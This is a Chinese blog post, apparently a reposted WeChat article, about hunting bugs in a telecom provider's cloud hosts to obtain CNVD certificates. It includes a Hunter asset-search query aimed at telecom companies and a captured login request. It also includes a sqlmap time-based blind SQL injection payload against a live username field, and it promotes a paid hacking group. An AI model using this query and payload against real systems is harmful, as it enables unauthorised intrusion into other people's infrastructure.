轻松拿CNVD证书捡漏详细过程
2023-4-28 23:59:32 Author: 渗透安全团队(查看原文) 阅读量:69 收藏

点击蓝字,关注我们
01
前言

鹰图真好用HAHAHAHA.

今天讲点压箱底的东西.

02
灵机一动

最近这半个多月,瓶颈期了,黑盒黑不出东西,白盒审不出东西

幸好今天灵机一动换了个资产搜集语法直接打到移某通信的swagger未授权访问。

语法:

(icp.name=”中国XX通信”or icp.name=”中国X信”or icp.name=”中国X通”or icp.name=”中国X塔”) and ip.country=”CN” and web.tag=””

其中web.tag是鹰图对资产打的标签
这里选择web.tag=”API Manager”
出来了,swagger ui的界面,一个未授权GET

交个CNVD齐活!

你以为这就结束了吗?

03
心有不甘

    一口老血喷出(后面才知道是我那位冤种好友羽义在3月底交的555555555

    这是突然想到,这是一台云主机,或许我可以看看它其他的端口,利用鹰图,IP详情

只要50积分

可以查看各个端口的信息

于是,开启一波测试

04
峰回路转

测试了半天,真的吐血了,各种WAF拦截/(ㄒoㄒ)/~~

可惜

车到山前必有路

51001端口

admin弱口令测试一下,没出,简单抓个包看看

POST /api/auth/login HTTP/1.1Host: xxxxxxxxxxContent-Length: 40Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58Content-Type: application/json;charset=UTF-8Origin: xxxxxxxxxxxxxxxx:51001Referer: xxxxxxxxxxxxxxx:51001/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close{"username":"admin","password":"123456"}

不同于前面的测试,在之前的测试中,可以从请求包中很明显的发现存在安全狗(字段safedog-xxxxx=xxxxx

而这个数据包,它没有

我直接SQLMAP梭哈

WOC!起飞!

Parameter: JSON username ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: {"username":"admin') AND (SELECT 7495 FROM (SELECT(SLEEP(5)))bxrT) AND ('LFaX'='LFaX","password":"123456"}

参数username存在SQL注入

康康DBA

虽然False,但好歹一张CNVD事件证书到手
05
锦上添花

20022端口

同样的,弱口令+抓包。

同样的,请求包无waf字段

    跟前面那个的数据包几乎一模一样。但是数据包请求的ip地址不同。

    继续,梭哈!

WOC!爱了爱了
DBA?

True!

BUT!

“渗透测试讲究点到为止”

证书+1
效率杠杠的

静等下周的证书

如果,你也像我一样,那真的是,泰裤辣!


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247503969&idx=2&sn=862f67fee32dd413d5506f9c3bdb3d80&chksm=c1762dcef601a4d86489e0c4edd92ac05a3386370b5461c52467be5a81e0e42b44a2e00f57a0#rd
如有侵权请联系:admin#unsafe.sh